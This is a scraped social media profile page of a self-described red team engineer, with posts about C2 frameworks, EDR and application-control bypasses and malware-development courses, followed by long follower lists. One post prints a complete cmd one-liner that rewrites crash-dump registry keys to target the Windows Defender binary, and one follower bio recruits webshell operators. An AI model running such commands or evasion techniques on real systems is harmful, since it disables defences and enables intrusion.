Ben 🇺🇸 @coremedd
Red Team Engineer | Interested in BGP, AV/EDR Evasion, Windows Internals, and other shit | C, C++, Go, x86 assembly dev | Operator of AS395044 coremed.su Chicago, IL Joined April 2022-
Tweets279
-
Followers119
-
Following862
-
Likes434
mitmproxy is in the Microsoft Store, just in case you need it for some reason. #LivingOffMicrosoftStore
Disappointing red team affirmations
Exciting updates coming soon! - New specialized training arriving by the end of the month. - The Malware Development course will be adding modules based around AD attacks. - The Offensive Phishing Ops course will be getting a specialized Living off Trusted Sites (LOTS)…
This was kinda interesting to run into in the wild - the developer of this malware wanted to to terminate all TCP connections of a process via the TCP table. Instead of using SetTcpEntry, they reimplemented the entire function by copying the underlying implementation from…
Greetings from #ReactOS. ;)
Introducing Havoc Professional: A Lethal Presence We’re excited to share a first look at Havoc Professional, a next-generation, highly modular Command and Control framework, and Kaine-kit our fully Position Independent Code agent engineered for stealth! infinitycurve.org/blog/introduct…
Securing Public GraphQL APIs - A Practical Guide for Developers 0xd33r.com/article/2025/g… Seeing GraphQL left wide open is still way too common—introspection, broken auth, and resolver-level access issues that lead to full compromise. I wrote a practical guide to locking it down.
So excited to speak at #BHUSA for the first time this year! I'll talk about training LLMs on verifiable tasks (including what exactly that means) with a case study automating some maldev work.
Me and the homies are dropping browser exploits on the red team engagement 😎. Find out how to bypass WDAC + execute native shellcode using this one weird trick -- exploiting the V8 engine of a vulnerable trusted application. ibm.com/think/x-force/…
Loading a DLL into lsass.exe by editing a registry key value: github.com/Maldev-Academy…
Very proud of this. You can run arbitrary BOFs through Beacon and every API call will have a fully backed stack without needing to modify or recompile them.
Video demo of bypassing Windows Defender App Control with Loki C2! Blog with details coming in 1-2 weeks. Yes -- @d_tranman and I created an entire C2 in JavaScript and it bypasses all the things 🥷🧙♂️🪄
We're excited to announce the upcoming launch of our new course: Offensive Phishing Operations. More Info: maldevacademy.com/phishing-course Syllabus: maldevacademy.com/phishing-cours… Launch date: March 2025
In the new version windbg opens a suggestions box when you type "!" with all the optional extensions
In the latest challenges, utilize both timer APIs and worker item APIs to proxy the execution of NtAllocateVirtualMemory, obfuscating the call stack during the memory allocation process, and bypassing stack analysis detection.
Clearing up some points on Loki C2. When I say “undetectable” I mean by current EDR capabilities. I created the C2 to take advantage of a new execution technique I discovered, similar to side loading or click-once. The technique itself doesn’t need a C2, it could have been…
Loki C2 is coming.. Cross-platform Stage 1 C2, battle-tested in ops for 8 months against the world’s leading EDRs and MSSPs, undetectable, bypasses Application Control/WDAC.. Shoutouts to @d_tranman for helping build the project, and @chompie1337 & @knavesec for inspiration!
Is your EDR a dump? Yes it is! cmd /v/c "set R=reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /f /v&!R! CrashDumpEnabled /d 7 /t 4&!R! DumpFileSize /d 666 /t 4&for /f "delims=*" %i in ('sc qc WinDefend^|find "PATH_"')do (set t=%i&!R! DedicatedDumpFile /d !t:~29,-1!)"
We're releasing challenges and code solutions for file time stomping and proxying execution early next week.
For those that often write BOF code, who would prefer a middle ground design where you execute a fully linked PE file but still integrated with the beacon API during execution? I'm thinking of writing a PE loader that has this in mind. 1/
MonaBird @E2CugF7PMxw534
2 Followers 315 Following
EZ @IAMERICAbooted
2K Followers 1K Following Yesterday is history. Tomorrow is a mystery. Cloud Solutions Engineer at Contoso. Hacktive Directory admin. Posts don't represent my employer(s).
Madalena @Bralwo0012
19 Followers 864 Following I’m not a one in a million kind of girl, I’m a once in a lifetime kind of woman.
Lavinia @BauchKeaga40
42 Followers 2K Following
Felicity @RKertzmann10258
53 Followers 2K Following
Gabe Ramos @GabeRamos27
80 Followers 436 Following
JB @JoshB96009544
75 Followers 508 Following
Drone Wars @dronewars2042
80 Followers 680 Following The most immersive FPS ever made. Unforgiving combat expercience where drones hunt down enemies with no mercy, ammo is limited, and death is permanent.
Vwuhalt @Vwuhalt0651512
40 Followers 2K Following
Coloring Store @ChrisCh87428955
87 Followers 269 Following 📚 FREE printable coloring books for kids! 📥 No sign-up – instant PDF downloads 🎨 Cute themes & adorable illustrations 👨👩👧 Perfect for parents, teachers
Salamoo @Salamoo541
36 Followers 118 Following
Levoo @Levoo37570
51 Followers 931 Following
Monique Clarke @clarke_mon5581
1 Followers 173 Following Recruiting webshell engineers to penetrate websites, with a monthly salary of up to $100,000. If interested, please contact https://t.co/LOl7m1sSph
flux @0xfluxsec
1K Followers 941 Following Cyber professional (red team), security and systems programming | Rust | https://t.co/QIih2B7vya | https://t.co/VC3xsm0Wvq
m00ndie @_m00ndie
404 Followers 420 Following Malware Development | Reverse Engineering | Penetration Testing | Red Teaming | Bug Bounty
evict @xaimdb
0 Followers 33 Following
mult1pl3xR @mult1pl3xR
14 Followers 297 Following
. @lSB_23l
1 Followers 118 Following
Julie Edwards @JulieEdwar17115
30 Followers 1K Following
Peter Winter-Smith @peterwintrsmith
6K Followers 3K Following Security researcher & implant developer @mdseclabs; developing SAST @wsastsupport; malware, code analysis, appsec, cryptography. Trying to follow Christ.
Tyshon @TyshonKmpyXRw
7 Followers 186 Following
fr0g @dafr0g_
957 Followers 841 Following 30 years in security. no certs. defense is dead. devsecops. founding member of @BlackLotusLabs. follow me for all things security, AI, and geopolitics.
Darth Sidious 🇹�... @deathorsufferin
54 Followers 353 Following
solst/ICE @IceSolst
21K Followers 2K Following Pentester turned seceng turned meeting canceller - https://t.co/5hHG2R5lRS (-13$ ARR)
Jason Damron @JasonSDamron
1K Followers 1K Following Co-Founder @Sensilla_Inc | software developer | network security | Previously: { CoFounder: https://t.co/7jroGp8Vf6, LeadDev: DragonNIDS }
exlagsx @Exodia6542
150 Followers 1K Following 🖥️ Inzusiast and resercher | actively fighting cybercrime. 🪐
Dr Gerhard Knecht, Ph... @GerhardKnecht
14K Followers 11K Following Cybersec. & Audit VP, Global CISO, Global Head MSS, Prof. Speaker, TV appearance, Top 10 UK security personality 2010, Compliance guru, AI, Followback Security.
ergoproxy @_erg0sum
2K Followers 2K Following 16 year old whimsical wizard and part time fintech phantom. Red Team & Bug Bounty. CPTS,CRTP | Views are my own. Not affiliated with my employer.
Steven Lowson @StevoLowson
578 Followers 2K Following Security Ninja I like to break things 🤓. All tweets/opinions are my own.
RussianPanda 🐼 �... @RussianPanda9xx
15K Followers 523 Following Меня ищет МВД 🚔 | Threat Hunter @HuntressLabs | TRACLabs | Malware Addict | DFIR
Alex @cryptokeeper434
542 Followers 4K Following I am a government whistleblower, Muay Thai trainer, law school graduate,& business owner. Evil must be dragged into what it fears the most,& that is light.
�... @icmpoff
1K Followers 1K Following #LizardSquad #botnetgod #htp Allies: @1mf | @kayte | @DoxbinHQ | @xml | @ikthagod
mattacus @mattacusmaximus
1K Followers 656 Following Security Engineer | Red Team Operator | OSCP | Seeker of Knowledge | Lover of Linux | No Filter | Opinions = Mine | https://t.co/1eKZHcN14R
s4ar @s4ar1337
0 Followers 2 Following
vasubuddala @Rockyjanu9876
44 Followers 2K Following
Viral Meme Guy @AmusedCow
12K Followers 5K Following Never lose a bet again. Don’t believe me? Click the link in my bio 💴 UK only
CC @0xf7a19
228 Followers 365 Following
Justin Elze @HackingLZ
65K Followers 5K Following CTO @TrustedSec | Former Optiv/SecureWorks/Accuvant Labs/Redspin | Race cars
Abdulla @bahraini
2K Followers 5K Following
CHINONSO OKEKU @okekuchinonso
0 Followers 728 Following
Hash Berk @BerkHash
8 Followers 230 Following
jono 🦋 @jonomxr
57K Followers 762 Following (he/him) https://t.co/SWBEqc1lJW & https://t.co/lDEhOTWkO3
WGN TV News @WGNNews
433K Followers 1K Following Chicago's very own source for news, weather, sports and entertainment. ✶ https://t.co/wPdvcQZiSm ✶ https://t.co/2reOgxTzGV
Brownells, Inc. @BrownellsInc
254K Followers 4K Following Serious About Firearms Since 1939™, Brownells is the world’s leading source for guns, gun parts & accessories, ammo, gunsmithing tools, survival gear and more.
Cody Thomas @its_a_feature_
7K Followers 310 Following Mythic Developer (https://t.co/Uz4fOxIUbe) | @SpecterOps @[email protected] | @its-a-feature.bsky.social
Zed @zeddotdev
56K Followers 46 Following A next-generation code editor that enables high-performance collaboration with AI and your team. https://t.co/4Ua0UqLrsv
green @greentheonly
85K Followers 0 Following I report what I see. If it's good, it's good; if it's bad, it's bad. Does not depend on me. Make them release more awesome stuff. Don't shoot the messenger.
Altered Security @AlteredSecurity
7K Followers 2K Following Global leader in hands-on learning for enterprise and cloud security education. Join 40000+ infosec professionals from 130+ countries
Tim McGuffin @NotMedic
6K Followers 2K Following Back to Red Teaming. Risk Hunter. DEFCON Staff & CFP Board. MS in DF. Fmr Fire/EMS. Red and Blue. Builder. Morally Flexible. https://t.co/zakkIXeyHu @ bluesky
EZ @IAMERICAbooted
2K Followers 1K Following Yesterday is history. Tomorrow is a mystery. Cloud Solutions Engineer at Contoso. Hacktive Directory admin. Posts don't represent my employer(s).
Kylm @0xKylm
348 Followers 1K Following reverse fuzzing and maldev / internals enjoyer at @FuzzingLabs 20yo https://t.co/koi6Phdmmf
slutgreaper @slutgreaper2
584 Followers 169 Following yall can’t get rid of meee @wtvslutgreaper will be back
Raul • 𝖙𝖍𝖊... @theg3ntl3m4n
1K Followers 646 Following Lead Red Team @beyondtrust | Ex-Red Team @mandiant @crowdstrike
Chicago Flips Red @FlipChicagoRed
18K Followers 129 Following CFR is a grassroots initiative dedicated to transforming the political landscape by prioritizing the needs of communities and citizens of Chicago
The Luxury Watch Guy @LuxuryWatchGuy1
72K Followers 4K Following buyer & seller of fancy watches- join our TG chat for live daily watch deals https://t.co/JHdOXU9t5d
Alex Brandon @alexbrandon
803 Followers 534 Following Associated Press photographer in Washington, DC
Ƒʉͫcͧкͭιͪηͣ... @th3v0t4ry
38K Followers 518 Following 𝙱𝚛𝚎𝚊𝚔𝚎𝚛 𝚘𝚏 𝚙𝚎𝚘𝚙𝚕𝚎, 𝚙𝚛𝚘𝚌𝚎𝚜𝚜𝚎𝚜, & 𝚝𝚎𝚌𝚑𝚗𝚘𝚕𝚘𝚐𝚢. 𝙱𝚕𝚊𝚌𝚔𝚑𝚘𝚕𝚎 𝚏𝚘𝚛 𝚐𝚘𝚘𝚍 𝚒𝚍𝚎𝚊𝚜 & 𝚒𝚗𝚝𝚎𝚗𝚝𝚒𝚘𝚗𝚜. 𝙷𝚊𝚗𝚐𝚜 𝚠/ 𝚓𝚘𝚌𝚔𝚜 & 𝚗𝚎𝚛𝚍𝚜. 𝙲𝚘𝚗𝚜𝚒𝚐𝚕𝚒𝚎𝚛𝚎. 𝙲𝚊𝚛𝚗𝚒𝚟𝚘𝚛𝚎. 𝙲𝚘𝚖𝚖𝚘𝚗 𝚎𝚗𝚎𝚖𝚢.
🩺 Dr. Napervillain... @Type07Safety
19K Followers 474 Following Me: Doctor, MBA, entrepreneur, gym rat, health nut, gun bunny advocate. Likes: Gold & silver, guns, MMA, economics & trading. Tequila aesthete. Meme connoisseur
Hard Pass @HardPass4
61K Followers 2K Following Raising hell with the Hippies and the Cowboys | Grilling/Smoking Meat | Things That Go Bang | Sharp Objects | Tools and Woodworking | NOT NICK OFFERMAN
JB @JoshB96009544
75 Followers 508 Following
B&T USA @BruggerThomet
2K Followers 9 Following B&T has been manufacturing only the finest Swiss-made defense products for nearly 30 years.
USCCA @USCCA
96K Followers 553 Following We serve gun owners who want to responsibly protect their loved ones. (Monthly) FREE Gun Giveaway Entry: https://t.co/xGjBvBNtTd
Drone Wars @dronewars2042
80 Followers 680 Following The most immersive FPS ever made. Unforgiving combat expercience where drones hunt down enemies with no mercy, ammo is limited, and death is permanent.
motorhome laboratorie... @motorhomelabs
2K Followers 270 Following Drugs are feelings; feelings are drugs. Testing and making things.
anubis @AnubisOnSec
3K Followers 1K Following Logging into things I shouldn't I build and break things as a Red Team Lead @ Large GPU Maker
ReactOS @reactos
20K Followers 560 Following Discover a free and open source operating system able to run your favorite application and drivers compatible with Windows.
Doc Strangelove @DocStrangelove2
185K Followers 1K Following I love guns. I post firearms through history and different forms of media. Grizzly/AK Stan. Gun Posts Daily!
Nordgirls @nordgirls
224K Followers 19 Following @brunettebmbs || @feousu || @orphictional || turn on notifs✨
Clash Report @clashreport
626K Followers 2 Following Breaking news, reports, and opinions from ongoing clashes of the world. English | Türkçe | عربي
Crash Makerspace @CrashMakerspace
2K Followers 11 Following College at 16 - BS in Computer Engineering & Master's in Machine Learning. Self-taught in 3D Modeling/Material Science/Circuits. Let's learn something together!
Boston Consulting Gro... @BCG
508K Followers 825 Following Official global account of Boston Consulting Group. Highlights of our work, initiatives, people, partnerships, and more. Also @BCGhenderson & @bcgx_
Tech Bro Memes @techbromemes
25K Followers 34 Following 💻 Tech bro memes | Memeing from first principles | I’m like the Peter Thiel of Memes https://t.co/HMyrShAIqg
SilencerShop @SilencerShop
16K Followers 201 Following Suppressors Made Simple. Your no-nonsense guide to 2A & NFA. #SilencerShop
Gas Station Boner Pil... @Adderall_King
1K Followers 2K Following Ban Weed | Legalize Cocaine | Nationalize Adderall | Matt Gaetz/Gavin Newsom 2028 | Hunter Biden Did Nothing Wrong 🌴Alt: @Whale_Hunter_22
Panos Gkatziroulis �... @netbiosX
25K Followers 812 Following Red/Purple Teamer | Blogger | Ex-Director @pentestlabltd | Mod @ https://t.co/1nzjl9KpSH | https://t.co/mIM1GA1mN4
Daniel Defense @DanielDefense
265K Followers 180 Following The world's most trusted firearms, engineered and built by the world's finest craftsmen - right here in America.
Nir Ohfeld @nirohfeld
4K Followers 841 Following Head of Vulnerability Research @wiz_io | @Microsoft MVR (2021-2025) | Pwn2Own 2025 | @Forbes 30 Under 30
noodlearms @infosecnoodle
291 Followers 303 Following
Trevor Rizzbolt @rizzbolt
12K Followers 1K Following Place finder. Geoguessr Enjoyer. 1310 ELO (updated daily). 🚨I AM NOT TREVOR RAINBOLT🚨
Tony @TJ_Null
23K Followers 490 Following Blue Teamer in Disguise. Blog at https://t.co/spa33ybIVL. SANS Netwars Champion. Former community manager and founder of the Offsec community for @offsectraining
Goofies Of Chicago @Chicago_Goofies
85K Followers 2K Following Independent news covering Chicago and the surrounding areas.
Nite Watches @NiteWatches
2K Followers 122 Following Independent British brand creating exceptional watches for those that are restless in their pursuit to get the most out of life. #TimeToExplore
William Knowles @william_knows
1K Followers 3 FollowingTrends for United States
You might like
